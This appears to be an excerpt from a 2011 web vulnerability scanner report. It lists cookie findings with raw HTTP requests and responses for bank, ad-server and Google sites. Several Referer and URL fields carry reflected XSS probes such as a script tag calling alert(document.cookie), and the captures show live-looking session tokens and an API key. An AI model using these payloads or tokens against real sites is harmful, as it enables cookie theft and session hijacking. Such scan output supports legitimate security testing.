The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inside HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacyandsecurity HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /retirementlogin HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings/featured-cd.html HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /securityplus HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.webveteran.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=8283151;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/ Set-Cookie: CFTOKEN=bf0ce741d922432b-17A7490E-5056-A306-AF9E960E65180C8B;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/ Set-Cookie: SKIP=1;expires=Wed, 09-Feb-2011 23:45:08 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=EF949CC12A6233AB
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7829 Set-Cookie: JSESSIONIDRIB011=0000QfeDKqBzExihl0t6Sl1rbNV:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7828 Set-Cookie: JSESSIONIDRIB09=0000FrNgyz_FdPFwsTt_iMc_-lN:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter?requestCmdId=DisplayLoginPage HTTP/1.1 Host: www4.usbank.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:00:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Set-Cookie: JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; Path=/internetBanking Set-Cookie: CAMPID=""; Expires=Sat, 02 Feb 2041 04:23:43 GMT; Path=/; Domain=.usbank.com Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14681 Set-Cookie: JSESSIONIDRIB09=0000K4E52Qoy6PbGS6Z06RA5tSI:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14682 Set-Cookie: JSESSIONIDRIB011=0000ggpvqAphewOgNOFlO8lrK0H:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14538 Set-Cookie: JSESSIONIDRIB011=0000AgcxpIllPHFlV7I1C0_htWM:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14537 Set-Cookie: JSESSIONIDRIB09=0000ow2BUtOGja-8V-F7CZsYAu6:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /planning/investments.action HTTP/1.1 Host: www6.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=wareseekercom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90|468x60&p=16284953&a=1&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&rurl=http%3A%2F%2Fburp%2Fshow%2F30&f=0&rnd=16284848 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arn9a2NZaiMt6memKmHwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bOhCZaj5F8OTFsyVTkN7ZcNnRH2BBBlPyXJhFNDjgcJVvgaVG11CndFwGrWSEZc2naDJGDqftHQnmOHDvd3ePbOL6FaZdDGPg1Lmnn0J9OYX6Zbhbbv4GfpndrHVmW0s1qVrOtS6IP3EdwCpNAPNHMTens1QnwfVYFZb9HSyoPpMngmEQARRrTQDIAvXR3FQ3SYbdA8SQHiZbodgZap2C6ZaZamQrMS1cCcKUHYxod4r4Zb1YydwXbNmyf51VTTd7RQoZd7rH6AYyNUaywojPuhZcvhp
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/ajs.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/al.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/avw.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/ck.php HTTP/1.1 Host: ad.thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4; __qca=P0-629275191-1296696399668; OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; _OASCCAP[1930]=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /www/delivery/lg.php?bannerid=6337&campaignid=1930&zoneid=113&OACBLOCK=345600&OASCCAP=1&loc=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more&cb=def1805d3d HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel?id=971555&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 21:59:54 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT Set-Cookie: bh=...[SNIP]...; path=/; expires=Fri, 01-Feb-2013 21:59:54 GMT Cache-Control: no-store Last-Modified: Wed, 02 Feb 2011 21:59:54 GMT Pragma: no-cache Content-Length: 43 Content-Type: image/gif Age: 0 Proxy-Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1 Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@a@4d49757a@www.ehow.com"
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Type: image/gif Date: Wed, 02 Feb 2011 23:36:07 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC" Server: Apache-Coyote/1.1 Set-Cookie: vsd="0@1@4d49ea68@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/ Content-Length: 42
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /select/Login?sourceid=awo&subid=us-en-et-symh&medium=link&hl=en HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/track.php?visitorId=7432e15fddd3a34a2d79b00lmU2qECVV&tracking=F&url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2Ffeatures%2F&referrer=H_burp%2Fshow%2F38&getParams=%3F95e51--%253E%253Ca%253E1fddadebe75%3D1&anchor=&cookies= HTTP/1.1 Host: affiliate.invisionpower.com Proxy-Connection: keep-alive Referer: http://www.invisionpower.com/products/board/features/?95e51--%3E%3Ca%3E1fddadebe75=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61175156.1296696677.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=61175156.1901611536.1296685558.1296685558.1296696677.2; __utmc=61175156; __utmb=61175156.1.10.1296696677
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:30:40 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 X-Powered-By: PHP/5.2.9 P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC" Set-Cookie: PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; expires=Sun, 31-Jan-2021 01:30:40 GMT; path=/; domain=.invisionpower.com Content-Length: 0 Content-Type: application/x-javascript
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2F&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966855687740 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogsearch.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:19 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=109a9aeaece08aed:TM=1296691699:LM=1296691699:S=sEECQby9jva9KsA1; expires=Sat, 02-Feb-2013 00:08:19 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:18 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=75899bb590a713b6:TM=1296691698:LM=1296691698:S=LGIgDlcm48-CMNO0; expires=Sat, 02-Feb-2013 00:08:18 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; 